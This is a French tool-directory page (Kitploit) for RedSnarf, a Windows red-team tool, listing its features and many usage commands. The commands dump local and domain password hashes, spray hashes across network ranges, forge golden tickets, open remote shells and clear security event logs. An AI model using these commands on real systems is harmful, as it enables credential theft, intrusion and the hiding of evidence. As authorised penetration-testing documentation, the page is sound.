Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
redsnarf — RedSnarf est un outil de test d'intrusion / red teaming pour environnements Windows. | Kitploit
Outils/GitHubGitHub/nccgroup/redsnarf
Cassage de Mots de PasseEscalade de PrivilègesGénération de PayloadsExploitationAnalyse de HachageMouvement LatéralCollecte d'InformationsPost-ExploitationTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à Distance
1.2k23524il y a 9 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHubnccgroup/redsnarf

redsnarf

RedSnarf est un outil de test d'intrusion / red teaming pour environnements Windows.

Voir le dépôtSite web
    ______           .____________                     _____  
\______   \ ____   __| _/   _____/ ____ _____ ________/ ____\ 
 |       _// __ \ / __ |\_____  \ /    \\__  \\_  __ \   __\  
 |    |   \  ___// /_/ |/        \   |  \/ __ \|  | \/|  |    
 |____|_  /\___  >____ /_______  /___|  (____  /__|   |__|    
        \/     \/     \/       \/     \/     \/         
                                  [email protected]
                                                  @redsnarf

GitHub license

RedSnarf est un outil de test d'intrusion / red-teaming par Ed Williams pour récupérer les hashs et les identifiants à partir de postes de travail Windows, serveurs et contrôleurs de domaine en utilisant des techniques OpSec sûres.

Voir notre chaîne YouTube pour les vidéos https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ

Les fonctionnalités de RedSnarf incluent :

• Récupération des hashs SAM locaux
• Énumération des utilisateurs s'exécutant avec des privilèges système élevés et leur mot de passe LSA secrets correspondant ;
• Récupération des credentials en cache MS ;
• Pass-the-hash ;
• Identification rapide des combinaisons nom d'utilisateur/mot de passe faibles et devinables (par défaut administrator/Password01) ;
• Capacité de récupérer les hashs sur une plage ;
• Hash spraying -
Credsfile acceptera un mélange de pwdump, fgdump et de nom d'utilisateur et mot de passe en texte clair séparés par un espace ;
• Dump de Lsass pour analyse hors ligne avec Mimikatz ;
• Dump des hashs du contrôleur de domaine en utilisant NTDSUtil et récupération de NTDS.dit pour analyse locale ;
• Dump des hashs du contrôleur de domaine en utilisant la méthode drsuapi ;
• Récupération du dossier Scripts and Policies d'un contrôleur de domaine et analyse pour 'password' et 'administrator' ;
• Capacité à déchiffrer les hashs cpassword ;
• Capacité à lancer un shell sur une machine distante ;
• Capacité d'effacer les journaux d'événements (application, sécurité, installation ou système) ; (Version interne uniquement)
• Les résultats sont enregistrés par hôte pour analyse.
• Activer/Désactiver RDP sur une machine distante.
• Changer le port RDP de 3389 à 443 sur une machine distante.
• Activer/Désactiver NLA sur une machine distante.
• Trouver où les utilisateurs sont connectés sur des machines distantes.
• Backdoor de l'écran de connexion Windows
• Activer/Désactiver UAC sur une machine distante.
• Stealth mimikatz ajouté.
• Analyse des hashs de domaine
• Capacité à déterminer quels comptes sont activés/désactivés
• Prendre une capture d'écran du bureau de l'utilisateur actif connecté à distance
• Enregistrer le bureau de l'utilisateur actif connecté à distance
• Déchiffrer Windows CPassword
• Déchiffrer le mot de passe WinSCP
• Obtenir les SPN des utilisateurs
• Récupérer les mots de passe WIFI depuis des machines distantes

Utilisation de RedSnarf

Prérequis :
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Récupération de Lsass en utilisant procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - utilisé pour l'analyse locale des informations Mimikatz

Afficher l'aide
./redsnarf.py -h
./redsnarf.py --help

Récupérer les hashs locaux

Récupérer les hashs locaux d'une seule machine en utilisant des identifiants locaux faibles et en effaçant le journal des événements de sécurité
./redsnarf.py -H ip=10.0.0.50 -uC security

Récupérer les hashs locaux d'une seule machine en utilisant des identifiants locaux faibles et en effaçant le journal des événements d'application
./redsnarf.py -H ip=10.0.0.50 -uC application

Récupérer les hashs locaux d'une seule machine en utilisant les identifiants de l'administrateur local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .

Récupérer les hashs locaux d'une seule machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com

Récupérer les hashs sur une plage réseau en utilisant les identifiants de l'administrateur local
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .

Récupérer les hashs sur une plage réseau en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com

Récupérer les hashs sur une plage réseau en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com

Hash Spraying

Pulvériser des hashs sur une plage réseau
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .

Récupérer les hashs sur une plage réseau avec connexion de domaine
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com

Vérifier rapidement les identifiants
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y

Vérifier rapidement un fichier contenant des noms d'utilisateur (-hS) et un mot de passe générique (-hP)
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y

Récupérer les hashs de domaine

Récupérer les hashs en utilisant la méthode drsuapi (la plus rapide)
Cette méthode prend en charge un indicateur optionnel -q y qui interrogera LDAP et affichera si les comptes sont actifs ou désactivés ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)

Récupérer les hashs en utilisant NTDSUtil
Cette méthode prend en charge un indicateur optionnel -q y qui interrogera LDAP et affichera si les comptes sont actifs ou désactivés ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)

Génération de Golden Ticket
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y

Collecte d'informations

Copier le dossier Policies and Scripts d'un contrôleur de domaine et analyser pour 'password' et 'administrator'
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y

Déchiffrer Cpassword
./redsnarf.py -uG cpassword

Trouver un utilisateur - En ligne
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name

Trouver un utilisateur - Hors ligne (recherche dans les informations pré-téléchargées)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name

Afficher la liste des tâches NT AUTHORITY\SYSTEM
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y

Capture d'écran du bureau d'un utilisateur actif connecté à distance
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y

Divers

Lancer un shell sur une machine en utilisant les identifiants de l'administrateur local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y

Lancer un shell sur une machine en utilisant les identifiants de l'administrateur de domaine
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y

Récupérer une copie de lsass pour analyse hors ligne avec Mimikatz sur une machine en utilisant les identifiants de l'administrateur local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y

Télécharger l’outil